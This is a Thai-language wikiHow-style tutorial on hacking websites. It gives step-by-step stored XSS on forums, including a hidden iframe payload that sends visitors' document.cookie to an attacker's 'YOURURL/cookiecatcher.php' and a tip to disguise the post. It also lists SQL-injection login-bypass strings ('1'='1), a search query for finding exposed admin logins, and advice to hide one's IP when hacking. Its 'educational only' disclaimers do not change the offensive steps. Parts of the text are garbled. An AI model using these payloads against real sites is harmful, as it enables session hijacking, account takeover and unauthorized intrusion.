วิธีการ แฮกเว็บไซต์

เรารู้ ว่าคุณก็อยากรู้ ว่าเขาแฮกเว็บไซต์กันยังไง แน่นอนว่าแฮกไม่ได้ทุกเว็บเสมอไป แต่ถ้าเว็บไหนหย่อนการรักษาความปลอดภัย ก็เป็นไปได้ เช่น พวกเว็บบอร์ด บทความวิกิฮาวนี้จะแนะนำวิธีการแฮกเว็บไซต์ให้คุณเอง โดยใช้ cross site scripting รวมถึง injection attacks ที่ล้วนแล้วแต่หาช่องโหว่แล้วเจาะเข้าไป นอกจากนี้ก็มีเคล็ดลับว่าจะแฮกให้เก่ง เขาทำกันยังไง

หมายเหตุ: ย้ำว่าบทความวิกิฮาวนี้มีเพื่อประโยชน์ในการศึกษาหาความรู้เท่านั้น ไม่ว่าจะสำหรับมือใหม่หัดแฮกแบบ white hat (เน้นป้องกันระบบ) หรือสำหรับคนที่อยากรู้ว่าการแฮกคืออะไร จะได้รักษาความปลอดภัยเว็บตัวเองได้ดีกว่าเดิม

วิธีการ 1

วิธีการ 1 ของ 3:

แฮกแบบ Cross Site Scripting

ดาวน์โหลดบทความ

{"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/e\/e6\/Hack-a-Website-Step-1-Version-2.jpg\/v4-460px-Hack-a-Website-Step-1-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/e\/e6\/Hack-a-Website-Step-1-Version-2.jpg\/v4-728px-Hack-a-Website-Step-1-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}

เว็บบอร์ดนี่แหละตัวอย่างที่เห็นเด่นชัด เพราะถ้าเว็บไหนแน่นหนา ก็ใช้วิธีต่อไปนี้ไม่ได้ window.alert(“test”) window.alert(“test”)window.alert(“test”)
{"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/2\/2f\/Hack-a-Website-Step-2-Version-2.jpg\/v4-460px-Hack-a-Website-Step-2-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/2\/2f\/Hack-a-Website-Step-2-Version-2.jpg\/v4-728px-Hack-a-Website-Step-2-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}

2
โพสต์เนื้อหาใหม่. ต้องพิมพ์โค้ดพิเศษใน “โพสต์” เพื่อใช้ดักข้อมูลของทุกคนที่คลิกเข้ามา
- ต้องทดสอบว่าระบบกรองโค้ดออกหรือเปล่า โดยโพสต์
```
<script>window.alert(“test”)</script>
```
  ถ้ามีหน้าต่าง alert โผล่มาตอนคลิกโพสต์ แสดงว่าเว็บนั่นอ่อน เจาะได้
{"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/4\/46\/Hack-a-Website-Step-3-Version-2.jpg\/v4-460px-Hack-a-Website-Step-3-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/4\/46\/Hack-a-Website-Step-3-Version-2.jpg\/v4-728px-Hack-a-Website-Step-3-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}

เป้าหมายของการเจาะ คือดักจับคุกกี้ของผู้ใช้ ให้คุณเข้าบัญชีของเขาในเว็บที่ระบบล็อกอินไม่แน่นหนานั้นได้ ที่ต้องใช้คือ cookie catcher สำหรับดักจับและเปลี่ยนเส้นทางคุกกี้ของเป้าหมาย ให้คุณอัพโหลด catcher เข้าเว็บเป้าหมายที่รองรับ php ยังไงลองค้นหาตัวอย่างโค้ดของ cookie catcher ในเน็ตเพิ่มเติมดู
{"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/b\/b9\/Hack-a-Website-Step-4-Version-2.jpg\/v4-460px-Hack-a-Website-Step-4-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/b\/b9\/Hack-a-Website-Step-4-Version-2.jpg\/v4-728px-Hack-a-Website-Step-4-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}

4
โพสต์พร้อม cookie catcher. ให้ใส่โค้ดที่จำเป็นในโพสต์ เพื่อดักจับคุกกี้แล้วส่งไปที่เว็บคุณแทน คุณต้องพิมพ์บางข้อความต่อท้ายโค้ดเพื่อกลบเกลื่อน โพสต์ของคุณจะได้ไม่ผิดสังเกตจนถูกลบ
- โค้ดตัวอย่างก็ประมาณ
  <iframe frameborder="0" height="0" width="0" src="javascript...:void(document.location='YOURURL/cookiecatcher.php?c=' document.cookie)></iframe>
{"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/d\/df\/Hack-a-Website-Step-5-Version-2.jpg\/v4-460px-Hack-a-Website-Step-5-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/d\/df\/Hack-a-Website-Step-5-Version-2.jpg\/v4-728px-Hack-a-Website-Step-5-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}

หลังจากนี้ คุณก็ใช้ข้อมูลในคุกกี้ที่เซฟลงเว็บคุณได้ตามสบาย

โฆษณา

วิธีการ 2

วิธีการ 2 ของ 3:

แฮกแบบ Injection Attacks

ดาวน์โหลดบทความ

{"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/a\/a2\/Hack-a-Website-Step-6-Version-2.jpg\/v4-460px-Hack-a-Website-Step-6-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/a\/a2\/Hack-a-Website-Step-6-Version-2.jpg\/v4-728px-Hack-a-Website-Step-6-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}

ต้องหาเว็บที่หย่อนความปลอดภัย พูดง่ายๆ คือระบบที่เจาะล็อกอินของแอดมินได้ง่าย ลอง search ใน Google ว่า admin login.asp ดู
{"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/a\/af\/Hack-a-Website-Step-7-Version-2.jpg\/v4-460px-Hack-a-Website-Step-7-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/a\/af\/Hack-a-Website-Step-7-Version-2.jpg\/v4-728px-Hack-a-Website-Step-7-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}

พิมพ์ admin แทน username แล้วใช้ตัวเลขใดตัวเลขหนึ่งของ string ที่ต่างกันออกไปเป็นรหัสผ่าน จะเป็นตัวเลขไหนก็ได้ แต่ที่พบบ่อยคือ 1’ หรือ ’1’='1 หรือ 2'='2
{"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/5\/5b\/Hack-a-Website-Step-8-Version-2.jpg\/v4-460px-Hack-a-Website-Step-8-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/5\/5b\/Hack-a-Website-Step-8-Version-2.jpg\/v4-728px-Hack-a-Website-Step-8-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}

เพราะต้องลองผิดลองถูกกันพักใหญ่
{"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/2\/26\/Hack-a-Website-Step-9-Version-2.jpg\/v4-460px-Hack-a-Website-Step-9-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/2\/26\/Hack-a-Website-Step-9-Version-2.jpg\/v4-728px-Hack-a-Website-Step-9-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}

ในที่สุดคุณก็น่าจะหา string ที่ใช้ล็อกอินในฐานะแอดมินของเว็บได้ ถ้าเว็บนั้นหย่อนการรักษาความปลอดภัย

โฆษณา

วิธีการ 3

วิธีการ 3 ของ 3:

แฮกยังไงให้ประสบความสำเร็จ

ดาวน์โหลดบทความ

{"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/0\/00\/Hack-a-Website-Step-10-Version-2.jpg\/v4-460px-Hack-a-Website-Step-10-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/0\/00\/Hack-a-Website-Step-10-Version-2.jpg\/v4-728px-Hack-a-Website-Step-10-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}

ถ้าอยากแฮกเว็บให้เป็นให้เก่ง ก็ต้องรู้ว่าคอมพิวเตอร์และเทคโนโลยีอื่นๆ นั้นทำงานยังไง ให้หัดใช้ภาษาเขียนโปรแกรม เช่น Python หรือ SQL จะได้ควบคุมดูแลคอมของตัวเองได้ดียิ่งขึ้น เห็นช่องโหว่ในระบบ
{"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/2\/2f\/Hack-a-Website-Step-11-Version-2.jpg\/v4-460px-Hack-a-Website-Step-11-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/2\/2f\/Hack-a-Website-Step-11-Version-2.jpg\/v4-728px-Hack-a-Website-Step-11-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}

บางเว็บจะแฮกได้ต้องมีความรู้เรื่อง html กับ javascript มากเป็นพิเศษ เป็นอะไรที่ต้องใช้เวลา แต่หาข้อมูลได้เยอะแยะในเน็ตแบบฟรีๆ ขอแค่ขยันและตั้งใจจริง
{"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/a\/a2\/Hack-a-Website-Step-12-Version-2.jpg\/v4-460px-Hack-a-Website-Step-12-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/a\/a2\/Hack-a-Website-Step-12-Version-2.jpg\/v4-728px-Hack-a-Website-Step-12-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}

Whitehats ก็คือแฮกเกอร์ฝ่ายธรรมะ แฮกเพื่อทำประโยชน์ หาช่องโหว่ในระบบรักษาความปลอดภัยเพื่อแก้ไขและป้องกัน ทำสังคมเน็ตให้น่าอยู่กว่าเดิม ถ้าอยากเรียนรู้เทคนิคการแฮกในทางที่ถูกที่ควร หรืออยากปกป้องเว็บตัวเอง ก็ลองปรึกษา ขอคำแนะนำจาก whitehats รุ่นพี่ดู
{"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/2\/2c\/Hack-a-Website-Step-13-Version-2.jpg\/v4-460px-Hack-a-Website-Step-13-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/2\/2c\/Hack-a-Website-Step-13-Version-2.jpg\/v4-728px-Hack-a-Website-Step-13-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}

ถ้าอยากรู้ลึกรู้จริงเรื่องการแฮก หรืออย่างน้อยๆ ก็แค่อยากทำระบบของคอมหรือเว็บตัวเองให้แน่นหนา ก็ต้องหมั่นศึกษาหาความรู้ เพราะมีหลายปัจจัยเลยที่ทำให้เกิดช่องโหว่ในระบบ แถมภัยต่างๆ และมิจฉาชีพในโลกไซเบอร์ก็เปลี่ยนแปลง พัฒนาตัวเองอยู่ตลอด คุณต้องรู้เท่าทัน
{"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/c\/ce\/Hack-a-Website-Step-14-Version-2.jpg\/v4-460px-Hack-a-Website-Step-14-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/c\/ce\/Hack-a-Website-Step-14-Version-2.jpg\/v4-728px-Hack-a-Website-Step-14-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}

อย่างที่บอกว่าโลกของแฮกเกอร์นั้นเปลี่ยนแปลงและอัพเดทอยู่ตลอดตามเทคโนโลยี คุณต้องหมั่นอัพเดททั้งความรู้และข่าวสาร ถ้ามัวแต่เฝ้าระวังจุดเดิม คราวหน้าอาจถูกแฮกช่องโหว่ใหม่ก็ได้!

โฆษณา

เคล็ดลับ

ลองเข้าเว็บบอร์ดหรือชุมชมแฮกเกอร์ต่างๆ จะได้รู้เคล็ดลับและข่าวสารใหม่ๆ
ย้ำกันอีกทีว่าบทความวิกิฮาวนี้มีเพื่อประโยชน์ในการศึกษาหาความรู้เท่านั้น ทั้งสำหรับมือใหม่หัดแฮกแบบ white hat (เน้นป้องกันระบบ) และคนที่อยากรักษาความปลอดภัยเว็บตัวเองได้ดีกว่าเดิม

โฆษณา

คำเตือน

แค่อ่านบทความนี้จบก็ใช่ว่าจะกลายเป็นแฮกเกอร์ได้เลย "ต้อง" รู้จักเพิ่มพูนความรู้ ฝึกฝนทักษะ และติดตามข่าวสารด้วย
เวลาทดลองแฮกจริง ควรปกปิด IP address ของตัวเองด้วยโปรแกรมที่เกี่ยวข้อง ลองค้นหาในเน็ตดู

โฆษณา

เข้าสู่ระบบ

วิธีการ แฮกเว็บไซต์

ขั้นตอน

แฮกแบบ Cross Site Scripting

แฮกแบบ Injection Attacks

แฮกยังไงให้ประสบความสำเร็จ

เคล็ดลับ

คำเตือน

บทความวิกิฮาวอื่น ๆ ที่่เกี่ยวข้อง

เกี่ยวกับวิกิฮาวนี้

บทความนี้เป็นประโยชน์กับคุณไหม

บทความที่เกี่ยวข้อง

ติดตามเรา

แบ่งปัน

Explore Categories